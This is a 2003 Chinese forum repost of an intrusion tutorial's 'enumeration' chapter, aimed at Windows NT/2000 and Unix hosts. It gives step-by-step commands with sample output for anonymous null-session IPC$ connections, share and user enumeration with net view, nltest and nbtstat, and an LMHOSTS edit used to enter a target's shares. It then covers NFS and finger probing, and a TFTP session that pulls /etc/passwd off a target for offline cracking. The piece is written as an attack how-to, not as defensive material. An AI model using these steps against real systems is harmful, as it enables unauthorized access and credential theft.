Quote: http://www.hacker.org.tw/?c=articles_show&articleid=39
張貼者: Kozxer 張貼日期: 2003-10-20 20:43系統網絡入侵方法小結
作者:霧中鳥
鄭重聲明:本文主要結合一些書籍和網絡上的一些相關文章加上我個人的一些經驗知識寫成,未經本人許可,嚴禁作為商業用途,否則追究法律責任!
第三章:查點
1、 indows NT/2000查點:Windows設計時為了方便資源的查詢,因此整個域和系統查點非常簡單。Net view就是一個很說明問題的例子,首先查點網絡上的域:
C:>net view /domain
Domain
—————————————-
CORLEONE
BARZINI_DOMAIN
TATAGGLIA_DOMAIN
BARZZI
The command completed successfully.
接著列出某個特定域內的計算機;
C:>net view /domain:corleone
Server Name Remark
——————————————————-
VITO Make him an offer he can't refuse
MICHAEL Nothing personal
SONNY Badda bing badda boom
FREDO I'm smart
CONNIE Don't forget the canoli
然後就開始查詢NT域控制器,在NT/2000的安裝光盤中有一個工具叫做nltest,主要是用來表示主域控制器和備份域控制器的:
C:>nltest /dclist:corleone
List of DCs in Domain corleone
VITO (PDC)
MICHAEL
SONNY
The command completed successfully
我們就可以從上面的輸出知道目標的主域控制器(Primary Domain Controller)為VITO。
微軟在出Windows NT/2000中存在一個敗筆,就是叫做"紅色按鈕"的脆弱點、空會話的連接,允許匿名登陸主機,這樣無疑給攻擊者提供了一個好的立足點:
net use 192.168.202.33IPC$ ""/user:""
這樣建立了空會話後,我們就可以利用netbios共享中net view查看主機上存在的共享資源:
C:>net view vito
Shared resources at 192.168.7.45
VITO
Share name Type Used as Comment
————————————————————————————–—
NETLOGON Disk Logon server share
Test Disk Public access
The command completed successfully
因此這樣就存在著暴露共享資源的危險,具體怎麼利用,相信很多對網絡安全知識有一定瞭解的朋友都知道怎麼做。這裡就順便介紹一下利用139端口入侵的一些方法吧:
首先利用WINDOWS自帶的工具nbtstat查出主機上的用戶名
C:>nbtstat -A 192.168.202.33
NetBios Remote Machine Name Table
Name Type Status
—————————————————————————
SANTINO <20>UNIQUE Registered
SANTINO <00>UNIQUE Registered
INTERNET <20>GROUP Registered
SANTINO <03>UNIQUE Registered
INTERNET <1E>GROUP Registered
SANTINO <20>UNIQUE Registered
ADMINISTRATOR <03>UNIQUE Registered
INTERNET <1D>UNIQUE Registered
..__MSBROWSE__.. <01>GROUP Registered
MAC Address=00-C0-4F-86-80-05
相信大家都看見第一行第一列的SANTINO了吧?這就是主機的名字,我們現在就要利用這個名字。在WINDOWS的系統目錄下有一個Lmhosts.sam有以下內容:
# Copyright (c) 1998 Microsoft Corp.
#
# This is a sample LMHOSTS file used by the Microsoft Wins Client (NetBios
# over TCP/IP) stack for Windows98
#
# This file contains the mappings of IP addresses to NT computernames
# (NetBIOS) names. Each entry should be kept on an individual line.
# The IP address should be placed in the first column followed by the
# corresponding computername. The address and the comptername
# should be separated by at least one space or tab. The "#" character
# is generally used to denote the start of a comment (see the exceptions
# below).
#
# This file is compatible with Microsoft LAN Manager 2.x TCP/IP lmhosts
# files and offers the following extensions:
#
# #PRE
# #DOM:<domain>
# #INCLUDE <filename>
# #BEGIN_ALTERNATE
# #END_ALTERNATE
# xnn (non-printing character support)
#
# Following any entry in the file with the characters "#PRE" will cause
# the entry to be preloaded into the name cache. By default, entries are
# not preloaded, but are parsed only after dynamic name resolution fails.
#
# Following an entry with the "#DOM:<domain>" tag will associate the
# entry with the domain specified by <domain>. This affects how the
# browser and logon services behave in TCP/IP environments. To preload
# the host name associated with #DOM entry, it is necessary to also add a
# #PRE to the line. The <domain> is always preloaded although it will not
# be shown when the name cache is viewed.
#
# Specifying "#INCLUDE <filename>" will force the RFC NetBIOS (NBT)
# software to seek the specified <filename> and parse it as if it were
# local. <filename> is generally a UNC-based name, allowing a
# centralized lmhosts file to be maintained on a server.
# It is ALWAYS necessary to provide a mapping for the IP address of the
# server prior to the #INCLUDE. This mapping must use the #PRE directive.
# In addtion the share "public" in the example below must be in the
# LanManServer list of "NullSessionShares" in order for client machines to
# be able to read the lmhosts file successfully. This key is under
# machinesystemcurrentcontrolsetserviceslanmanserverparameters ullsessionshares
# in the registry. Simply add "public" to the list found there.
#
# The #BEGIN_ and #END_ALTERNATE keywords allow multiple #INCLUDE
# statements to be grouped together. Any single successful include
# will cause the group to succeed.
#
# Finally, non-printing characters can be embedded in mappings by
# first surrounding the NetBIOS name in quotations, then using the
# xnn notation to specify a hex value for a non-printing character.
#
# The following example illustrates all of these extensions:
#
# 102.54.94.97 rhino #PRE #DOM:networking #net group's DC
# 102.54.94.102 "appname x14" #special app server
# 102.54.94.123 popular #PRE #source server
# 102.54.94.117 localsrv #PRE #needed for the include
#
# #BEGIN_ALTERNATE
# #INCLUDE localsrvpubliclmhosts
# #INCLUDE
hinopubliclmhosts
# #END_ALTERNATE
#
# In the above example, the "appname" server contains a special
# character in its name, the "popular" and "localsrv" server names are
# preloaded, and the "rhino" server name is specified so it can be used
# to later #INCLUDE a centrally maintained lmhosts file if the "localsrv"
# system is unavailable.
#
# Note that the whole file is parsed including comments on each lookup,
# so keeping the number of comments to a minimum will improve performance.
# Therefore it is not advisable to simply add lmhosts file entries onto the
# end of this file.
這大體是對這個文件的描述,我們可以把內容刪除掉,寫入如下的格式:
192.168.202.33 SANTINO
注意:IP與SANTINO中間存在一個空格。保存,然後把名字改成Lmhosts,不要擴展名。最後你就可以在查找-計算機中輸入機器名或者IP地址,就可以找到主機,雙擊就可以進入主機了。當然也可
以用運行-ip的方法也一樣。
2、 UNIX查點:大多數現代的UNIX實現依賴於TCP/IP連網特性,因此不會像通過其傳統的NetBios接口聯網的NT/2000那樣隨隨便便的洩漏信息,然而這一點並不能說UNIX可以免受查點技巧的侵害。
UNIX中有一個實用工具showmount,它在查點某個網絡中經由NFS出口的文件系統上很有用。下面以一個例子說明:
[japleak@root]$showmount -e 192.168.202.34
export list for 192.168.202.34:
/pub (erveryone)
/var (erveryone)
/usr user
-e開關指示所指定NFS服務器主機的出口清單。不幸的是,幾乎沒有什麼措施可以用來堵塞這個漏洞,因為NFS的缺省行為。
UNIX網絡信息的另一個潛在來源是NIS。NIS的主要問題是,一旦知道某台服務器的NIS域名,就可以使用簡單的RPC查詢取得其NIS映射表中的任何內容。NIS映射表是同一域內各主機關鍵信息的分佈式
映射關係。
下面再討論UNIX的一個實用工具finger,finger是自動獲取遠程主機上用戶信息的簡便方法。有不少系統管理員無意的讓fingerd運行在不安全的缺省配置上。下面的例子假設上次已經標識出運
行finger服務(端口號為79)的一台有效主機:
[japleak@root]$finger -l @targer.hackme.com
[target.hackme.com]
Login:root Name:root
Directory:/root Shell:/bin/bash
On since Sun Mar 28 11:01(PST) on tty1 11minutes idle
(messages off)
On since Sun Mar 28 11:01 (PST) on ttyp0 from :0.0
3 minutes 6 seconds idle
No mail.
Plan:
John Smith
Security Guru
Telnet password is my birthdate.
"finger 0@hostname"命令也會給出有用信息:
[japleak@root]$finger 0@192.168.202.34
[192.168.202.34]
Line User Host(S) ldle Location
* 2 vty 0 idle 0 192.168.202.14
Se0 Sync PPP 00:00:02
不過所有UNIX的查點技巧的先決條件是取得/etc/passwd文件,這裡值得提及的是TFTP(簡單文件傳輸協議),它是最為流行的攫取passwd文件的一種方法:
[japleak@root]$tftp 192.168.202.34
tftp>connect 192.168.202.34
tftp>get /etc/passwd /tmp/passwd.cracklater
tftp>quit
這個文件除了能用一些破解軟件破解,還能直接從文件中直接讀取用戶信息。
Copyright by 霧中鳥 Inc. All rights reserved.
轉載請註明版權信息,有疑問請與我聯繫(japleak@263.net)
留言